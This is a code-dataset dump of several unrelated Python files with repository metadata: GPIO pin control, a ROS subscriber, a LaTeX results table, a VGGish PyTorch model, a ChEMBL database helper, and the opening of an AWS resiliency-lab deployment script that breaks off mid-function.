labels (tuple): Labels to be explained
Returns:
List of (word, index of word in raw text, importance for target class) tuples.
"""
explainer = _get_explainer(method, kwargs)
explain_text_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_text, kwargs)
return explainer.explain_text(model_or_function, input_data, labels, **explain_text_kwargs)
def _get_explainer(method, kwargs):
method_class = getattr(methods, method)
method_kwargs = utils.get_kwargs_applicable_to_function(method_class.__init__, kwargs)
return method_class(**method_kwargs)
| 42.790123
| 99
| 0.742643
| 483
| 3,466
| 5.15942
| 0.407867
| 0.028892
| 0.036116
| 0.032103
| 0.369181
| 0.369181
| 0.337079
| 0.243178
| 0.243178
| 0.198234
| 0
| 0.002147
| 0.193883
| 3,466
| 80
| 100
| 43.325
| 0.889764
| 0.644836
| 0
| 0.1
| 0
| 0
| 0.038154
| 0.023957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.2
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0494a9e41efc09a0891a5e4ffe2bfd4e84d0d3
| 2,925
|
py
|
Python
|
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
try:
import RPi.GPIO as GPIO
except RuntimeError:
print("Error importing RPi.GPIO! This is probably because you need "
"superuser privileges. You can achieve this by using 'sudo' to run "
"your script")
gpios = [7, 8, 10, 11, 12, 13, 15, 16, 18, 19, 21, 22, 23, 24, 26, 29,
31, 32, 33, 35, 36, 37, 38, 40]
class Pin:
def __init__(self, number, value):
self.number = number
self.value = value
self.mode = 'out'
def set_value(self, value):
try:
GPIO.output(self.number, GPIO.HIGH if value else GPIO.LOW)
except:
pass
self.value = value
def set_mode(self, mode):
if mode == 'in' or mode == 'out':
self.mode = mode
try:
if mode == 'in':
GPIO.setup(self.number, GPIO.IN)
self.value = bool(GPIO.input(self.number))
print("set mode to in (value=" + str(self.value) + ")")
return self.value
else:
GPIO.setup(self.number, GPIO.OUT)
self.value = bool(GPIO.input(self.number))
print("set mode to out (value=" + str(self.value) + ")")
return self.value
except:
return self.value
def switch_value(self):
try:
GPIO.output(self.number, GPIO.LOW if self.value else GPIO.HIGH)
except:
pass
self.value = not self.value
def switch_mode(self):
if self.mode == 'out':
return 'in', self.set_mode('in')
else:
return 'out', self.set_mode('out')
class Header:
def __init__(self):
self.left_pins = []
self.right_pins = []
for x in gpios:
if x % 2 == 1:
self.left_pins.append(Pin(x, False))
else:
self.right_pins.append(Pin(x, False))
def get_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.value
def set_value(self, number, value):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.set_value(value)
break
def switch_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.switch_value()
break
def switch_mode(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.switch_mode()
header = Header()
try:
GPIO.setmode(GPIO.BOARD)
for id in gpios:
print('Initializing gpio ' + str(id))
GPIO.setup(id, GPIO.OUT, initial=GPIO.LOW)
print('Initialized GPIOs')
except:
print('Could not set GPIO mode to BOARD.')
| 29.545455
| 79
| 0.523419
| 372
| 2,925
| 4.026882
| 0.258065
| 0.078104
| 0.048064
| 0.053405
| 0.389186
| 0.333111
| 0.280374
| 0.23765
| 0.23765
| 0.23765
| 0
| 0.025932
| 0.367179
| 2,925
| 98
| 80
| 29.846939
| 0.78336
| 0
| 0
| 0.378049
| 0
| 0
| 0.094701
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121951
| false
| 0.02439
| 0.02439
| 0
| 0.256098
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b04e005435865593cbdccc3f6d9e91235157df4
| 1,395
|
py
|
Python
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | 1
|
2017-12-14T14:04:24.000Z
|
2017-12-14T16:58:05.000Z
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import rospy # For all things ros with python
# JointState is defined in sensor_msgs.msg
# If you know a message but not where it is
# call rosmsg info MSGNAME from the terminal
from sensor_msgs.msg import JointState
# This tutorial takes heavily from
# http://wiki.ros.org/ROS/Tutorials/WritingPublisherSubscriber(python)
# In this example we make a simple subscriber that listens for JointState
# messages, and prints them. Uses a functional approach.
def message_callback(msg):
"""This function is called on the message every time a message arrives."""
rospy.loginfo("Joint position received:"+str(msg.position))
def joint_listener():
"""Blocking function that sets up node, subscription and waits for
messages."""
# Start ros node
rospy.init_node("joint_listener", anonymous=True)
# Tell the central command we want to hear about /joint_states
rospy.Subscriber("/joint_states", # Topic we subscribe to
JointState, # message type that topic has
message_callback) # function to call when message arrives
rospy.spin()
# If this script is run alone, not just imported:
if __name__ == "__main__":
joint_listener()
# Ensure that the python script is executable by running:
# chmod +x joint_subscriber.py
# Call this script by running:
# rosrun joint_subscriber joint_subscriber.py
| 34.875
| 79
| 0.7319
| 197
| 1,395
| 5.076142
| 0.558376
| 0.039
| 0.026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.194982
| 1,395
| 39
| 80
| 35.769231
| 0.890472
| 0.658781
| 0
| 0
| 0
| 0
| 0.133183
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0bcb46e200df6f78d9fe78eb07f700564fadd3
| 4,084
|
py
|
Python
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | 1
|
2021-11-10T10:28:01.000Z
|
2021-11-10T10:28:01.000Z
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
# import pylatex
from pylatex import Document, Section, Tabular, Math, Axis, Subsection
import pandas as pd
import sys
import os
def main():
pm = u"\u00B1"
filename = sys.argv[1]
results = pd.read_csv(filename+'.csv')
cols = results.columns
task_fusion = ((results.loc[results['settings']=='overall']).loc[results['model']!='DummyClassifier']).sort_values('model')
reading = ((results.loc[results['settings']=='Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
cookie = ((results.loc[results['settings']=='CookieTheft']).loc[results['model']!='DummyClassifier']).sort_values('model')
memory = ((results.loc[results['settings']=='Memory']).loc[results['model']!='DummyClassifier']).sort_values('model')
pupil = ((results.loc[results['settings']=='PupilCalib']).loc[results['model']!='DummyClassifier']).sort_values('model')
ET_basic = ((results.loc[results['settings']=='ET_basic']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye = ((results.loc[results['settings']=='Eye']).loc[results['model']!='DummyClassifier']).sort_values('model')
Language = ((results.loc[results['settings']=='Language']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye_Reading = ((results.loc[results['settings']=='Eye_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
NLP_Reading = ((results.loc[results['settings']=='NLP_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
TextAudio = ((results.loc[results['settings']=='Text+Audio']).loc[results['model']!='DummyClassifier']).sort_values('model')
task_fusion = np.array(task_fusion.dropna()).astype('str')
reading = np.array(reading.dropna()).astype('str')
cookie = np.array(cookie.dropna()).astype('str')
memory = np.array(memory.dropna()).astype('str')
pupil = np.array(pupil.dropna()).astype('str')
ET_basic = np.array(ET_basic.dropna()).astype('str')
Eye = np.array(Eye.dropna()).astype('str')
Language = np.array(Language.dropna()).astype('str')
Eye_Reading = np.array(Eye_Reading.dropna()).astype('str')
NLP_Reading = np.array(NLP_Reading.dropna()).astype('str')
TextAudio = np.array(TextAudio.dropna()).astype('str')
abc = np.array((task_fusion, reading, cookie, memory, pupil, ET_basic, Eye, Language, Eye_Reading, NLP_Reading, TextAudio))
for i in range(len(abc)):
for j in range(len(abc[i])):
if abc[i][j][1] == 'RandomForest':
abc[i][j][1] = 'RF'
elif abc[i][j][1] == 'GausNaiveBayes':
abc[i][j][1] = 'GNB'
elif abc[i][j][1] == 'LogReg':
abc[i][j][1] = 'LR'
geometry_options = {"tmargin": "1cm", "lmargin": "1cm"}
doc = Document(geometry_options=geometry_options)
# for overall task_fusion_result
with doc.create(Section('Results')):
for i in range(len(abc)):
overall = abc[i]
with doc.create(Subsection(overall[0][0])):
with doc.create(Tabular('c c c c c c c c')) as table:
table.add_hline()
table.add_row(('Algo', 'N', 'AUC', 'F1', 'Accuracy', 'Precision', 'Recall', 'Specificity'))
table.add_hline()
for i in range(len(overall)):
table.add_row((overall[i][1], '162',
overall[i][3] + pm + overall[i][12], # roc
overall[i][4] + pm + overall[i][9], # f1
overall[i][2] + pm + overall[i][8], # acc
overall[i][5] + pm + overall[i][10], # prec
overall[i][6] + pm + overall[i][11], # rec
overall[i][7] + pm + overall[i][13])) # spec
doc.generate_pdf(filename, clean_tex=False, compiler='pdflatex')
main()
| 51.696203
| 131
| 0.578355
| 488
| 4,084
| 4.754098
| 0.256148
| 0.094828
| 0.080603
| 0.118534
| 0.3125
| 0.243103
| 0.228448
| 0.108621
| 0
| 0
| 0
| 0.011698
| 0.225514
| 4,084
| 78
| 132
| 52.358974
| 0.721783
| 0.027669
| 0
| 0.065574
| 0
| 0
| 0.160061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0
| 0.081967
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0d0466817dc17050d1085421ef9276feb2fb86
| 2,803
|
py
|
Python
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 26
|
2020-03-25T21:19:33.000Z
|
2022-02-01T15:14:29.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 7
|
2020-05-31T07:57:05.000Z
|
2021-12-23T10:16:55.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 8
|
2020-10-27T16:22:55.000Z
|
2022-03-28T22:48:07.000Z
|
import os.path as osp
import yaml
import torch.nn as nn
from torch import hub
__all__ = ['get_vggish', 'vggish_category_metadata']
model_urls = {
'vggish': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_orig.pth",
'vggish_with_classifier': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_with_classifier.pth"
}
def vggish_category_metadata():
cat_meta_file = osp.join(
osp.dirname(osp.realpath(__file__)), 'classifier_category.yml'
)
with open(cat_meta_file) as f:
cat_meta = yaml.safe_load(f) # [ [cat_name, mid], ... ]
cat_meta = [ {'name': e[0], 'id': e[1]} for e in cat_meta ]
return cat_meta
class VGGish(nn.Module):
def __init__(self):
super().__init__()
self.features = self.make_layers()
self.embeddings = nn.Sequential(
nn.Linear(512 * 4 * 6, 4096),
nn.ReLU(True),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Linear(4096, 128),
nn.ReLU(True),
)
@staticmethod
def make_layers():
layer_config = [64, "M", 128, "M", 256, 256, "M", 512, 512, "M"]
in_channels = 1
layers = []
for curr in layer_config:
if curr == "M":
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, curr, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = curr
return nn.Sequential(*layers)
def forward(self, x):
'''
x: [N, C, T]
'''
# It's regrattable tensorflow authors of this model treats audio signal as 2d
# [N, C, T] -> [N, C, T, 1]
x = self.features(x)
x = x.permute(0, 2, 3, 1) # to tf's [N, H, W, C] order
x = x.reshape(x.shape[0], -1)
x = self.embeddings(x)
return x
class VGGishClassify(VGGish):
'''
Beware that this is a multi-label, not multi-class classifer.
'''
def __init__(self, num_hidden_units=100, num_classes=527):
super().__init__()
self.classifier = nn.Sequential(
nn.Linear(128, num_hidden_units),
nn.ReLU(True),
nn.Linear(num_hidden_units, num_classes),
)
def forward(self, x):
x = super().forward(x)
x = self.classifier(x)
return x
def get_vggish(with_classifier=False, pretrained=True):
if with_classifier:
model = VGGishClassify()
url = model_urls['vggish_with_classifier']
else:
model = VGGish()
url = model_urls['vggish']
if pretrained:
state_dict = hub.load_state_dict_from_url(url, progress=True)
model.load_state_dict(state_dict)
return model
| 29.197917
| 112
| 0.576882
| 373
| 2,803
| 4.126005
| 0.351206
| 0.02729
| 0.051982
| 0.023392
| 0.128655
| 0.096166
| 0.096166
| 0.062378
| 0.062378
| 0.062378
| 0
| 0.03672
| 0.29076
| 2,803
| 95
| 113
| 29.505263
| 0.737425
| 0.081698
| 0
| 0.169014
| 0
| 0.028169
| 0.10782
| 0.03594
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098592
| false
| 0
| 0.056338
| 0
| 0.253521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0d272861a3704f10e9a92801a2d879819c1a06
| 12,584
|
py
|
Python
|
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
import os
import warnings
import pandas
import sqlite3
import logging
from typing import List
from dask import delayed, dataframe
from contextlib import closing
from cuchemcommon.utils.singleton import Singleton
from cuchemcommon.context import Context
warnings.filterwarnings("ignore", message=r"deprecated", category=FutureWarning)
logger = logging.getLogger(__name__)
BATCH_SIZE = 100000
ADDITIONAL_FEILD = ['canonical_smiles', 'transformed_smiles']
IMP_PROPS = [
'alogp',
'aromatic_rings',
'full_mwt',
'psa',
'rtb']
IMP_PROPS_TYPE = [pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64')]
ADDITIONAL_FEILD_TYPE = [pandas.Series([], dtype='object'),
pandas.Series([], dtype='object')]
SQL_MOLECULAR_PROP = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
"""
# DEPRECATED. Please add code to DAO classes.
class ChEmblData(object, metaclass=Singleton):
def __init__(self, fp_type):
context = Context()
db_file = context.get_config('data_mount_path', default='/data')
db_file = os.path.join(db_file, 'db/chembl_27.db')
if not os.path.exists(db_file):
logger.error('%s not found', db_file)
raise Exception('{} not found'.format(db_file))
self.fp_type = fp_type
self.chembl_db = 'file:%s?mode=ro' % db_file
logger.info('ChEMBL database: %s...' % self.chembl_db)
def fetch_props_by_molregno(self, molregnos):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = SQL_MOLECULAR_PROP % " ,".join(list(map(str, molregnos)))
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_props_by_chemble(self, chemble_ids):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
sql_stml = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = sql_stml % "'%s'" % "','".join([x.strip().upper() for x in chemble_ids])
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_molregno_by_chemblId(self, chemblIds):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.molregno as molregno
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join(chemblIds)
cur.execute(select_stmt)
return cur.fetchall()
def fetch_id_from_chembl(self, new_molecules: List):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT cs.molregno as molregno, md.chembl_id as chembl_id,
cs.canonical_smiles as smiles
FROM compound_structures cs,
molecule_dictionary md
WHERE md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join([x.strip().upper() for x in new_molecules])
cur.execute(select_stmt)
return cur.fetchall()
def fetch_chemblId_by_molregno(self, molregnos):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.chembl_id as chembl_id
FROM molecule_dictionary md
WHERE md.molregno in (%s)
''' % ", ".join(list(map(str, molregnos)))
cur.execute(select_stmt)
return cur.fetchall()
def fetch_approved_drugs(self):
"""Fetch approved drugs with phase >=3 as dataframe
Args:
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL approved drugs...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
di.molregno,
cs.canonical_smiles,
di.max_phase_for_ind
FROM
drug_indication AS di
LEFT JOIN compound_structures AS cs ON di.molregno = cs.molregno
WHERE
di.max_phase_for_ind >= 3
AND cs.canonical_smiles IS NOT NULL;"""
cur.execute(select_stmt)
return cur.fetchall()
def fetch_random_samples(self, num_samples, max_len):
"""Fetch random samples from ChEMBL as dataframe
Args:
num_samples (int): number of samples to select
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL random samples...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
cs.molregno,
cs.canonical_smiles,
LENGTH(cs.canonical_smiles) as len
FROM
compound_structures AS cs
WHERE
cs.canonical_smiles IS NOT NULL
AND
len <= """ + f'{max_len}' + """
ORDER BY RANDOM()
LIMIT """ + f'{num_samples};'
cur.execute(select_stmt)
return cur.fetchall()
def fetch_molecule_cnt(self):
logger.debug('Finding number of molecules...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT count(*)
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
'''
cur.execute(select_stmt)
return cur.fetchone()[0]
def _meta_df(self, **transformation_kwargs):
transformation = self.fp_type(**transformation_kwargs)
prop_meta = {'id': pandas.Series([], dtype='int64')}
prop_meta.update(dict(zip(IMP_PROPS + ADDITIONAL_FEILD,
IMP_PROPS_TYPE + ADDITIONAL_FEILD_TYPE)))
prop_meta.update({i: pandas.Series([], dtype='float32') for i in range(len(transformation))})
return pandas.DataFrame(prop_meta)
def _fetch_mol_embedding(self,
start=0,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.info('Fetching %d records starting %d...' % (batch_size, start))
imp_cols = ['cp.' + col for col in IMP_PROPS]
if molregnos is None:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
LIMIT %d, %d
''' % (', '.join(imp_cols), start, batch_size)
else:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
LIMIT %d, %d
''' % (', '.join(imp_cols), " ,".join(list(map(str, molregnos))), start, batch_size)
df = pandas.read_sql(select_stmt,
sqlite3.connect(self.chembl_db, uri=True))
# Smiles -> Smiles transformation and filtering
# TODO: Discuss internally to find use or refactor this code to remove
# model specific filtering
df['transformed_smiles'] = df['canonical_smiles']
# if smiles_transforms is not None:
# if len(smiles_transforms) > 0:
# for xf in smiles_transforms:
# df['transformed_smiles'] = df['transformed_smiles'].map(xf.transform)
# df.dropna(subset=['transformed_smiles'], axis=0, inplace=True)
# Conversion to fingerprints or embeddings
# transformed_smiles = df['transformed_smiles']
transformation = self.fp_type(**transformation_kwargs)
cache_data = transformation.transform(df)
return_df = pandas.DataFrame(cache_data)
return_df = pandas.DataFrame(
return_df,
columns=pandas.RangeIndex(start=0,
stop=len(transformation))).astype('float32')
return_df = df.merge(return_df, left_index=True, right_index=True)
return_df.rename(columns={'molregno': 'id'}, inplace=True)
return return_df
def fetch_mol_embedding(self,
num_recs=None,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.debug('Fetching properties for all molecules...')
if num_recs is None or num_recs < 0:
num_recs = self.fetch_molecule_cnt()
logger.info('num_recs %d', num_recs)
logger.info('batch_size %d', batch_size)
meta_df = self._meta_df(**transformation_kwargs)
dls = []
for start in range(0, num_recs, batch_size):
bsize = min(num_recs - start, batch_size)
dl_data = delayed(self._fetch_mol_embedding)(start=start,
batch_size=bsize,
molregnos=molregnos,
**transformation_kwargs)
dls.append(dl_data)
return dataframe.from_delayed(dls, meta=meta_df)
def save_fingerprints(self, hdf_path='data/filter_*.h5', num_recs=None, batch_size=5000):
"""
Generates fingerprints for all ChEMBL ID's in the database
"""
logger.debug('Fetching molecules from database for fingerprints...')
mol_df = self.fetch_mol_embedding(num_recs=num_recs, batch_size=batch_size)
mol_df.to_hdf(hdf_path, 'fingerprints')
| 39.202492
| 101
| 0.565559
| 1,398
| 12,584
| 4.912732
| 0.175966
| 0.030577
| 0.020821
| 0.03145
| 0.533925
| 0.50131
| 0.459377
| 0.444525
| 0.425451
| 0.385993
| 0
| 0.005983
| 0.335903
| 12,584
| 320
| 102
| 39.325
| 0.815843
| 0.112127
| 0
| 0.452174
| 0
| 0
| 0.348969
| 0.002474
| 0.004348
| 0
| 0
| 0.003125
| 0
| 1
| 0.056522
| false
| 0
| 0.043478
| 0
| 0.152174
| 0.013043
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b15f666dd8b6c5e2030f1efa5c2aa16458ac78c
| 14,567
|
py
|
Python
|
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
workshop/static/Reliability/300_Testing_for_Resiliency_of_EC2_RDS_and_S3/Code/Python/WebAppLambda/deploy_web_lambda.py
|
sykang808/aws-well-architected-labs-kor
|
da021a9f7501088f871b08560673deac4488eef4
|
[
"Apache-2.0"
] | null | null | null |
#
# MIT No Attribution
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import print_function
from botocore.exceptions import ClientError
import os
import sys
import logging
import traceback
import boto3
import json
LOG_LEVELS = {'CRITICAL': 50, 'ERROR': 40, 'WARNING': 30, 'INFO': 20, 'DEBUG': 10}
stackname = 'WebServersForResiliencyTesting'
AWS_REGION = 'us-east-2'
ARCH_TO_AMI_NAME_PATTERN = {
# Architecture: (pattern, owner)
"PV64": ("amzn2-ami-pv*.x86_64-ebs", "amazon"),
"HVM64": ("amzn2-ami-hvm-*-x86_64-gp2", "amazon"),
"HVMG2": ("amzn2-ami-graphics-hvm-*x86_64-ebs*", "679593333241")
}
def init_logging():
# Setup loggin because debugging with print can get ugly.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logging.getLogger("boto3").setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('nose').setLevel(logging.WARNING)
return logger
def setup_local_logging(logger, log_level='INFO'):
# Set the Logger so if running locally, it will print out to the main screen.
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def set_log_level(logger, log_level='INFO'):
# There is some stuff that needs to go here.
if log_level in LOG_LEVELS:
logger.setLevel(LOG_LEVELS[log_level])
else:
logger.setLevel(LOG_LEVELS['INFO'])
return logger
def process_global_vars():
logger.info("Processing variables from environment.")
try:
global stackname
stackname = 'WebServersForResiliencyTesting'
except SystemExit:
sys.exit(1)
except Exception:
logger.error("Unexpected error!\n Stack Trace:", traceback.format_exc())
def find_latest_ami_name(region, arch):
assert region, "Region is not defined"
assert arch, "Architecture is not defined"
assert arch in ARCH_TO_AMI_NAME_PATTERN, \
"Architecture must be one of {}".format(
ARCH_TO_AMI_NAME_PATTERN.keys())
pattern, owner = ARCH_TO_AMI_NAME_PATTERN[arch]
ec2 = boto3.client("ec2", region_name=region)
images = ec2.describe_images(
Filters=[dict(
Name="name",
Values=[pattern]
)],
Owners=[owner]
).get("Images", [])
assert images, "No images were found"
sorted_images = sorted(
images,
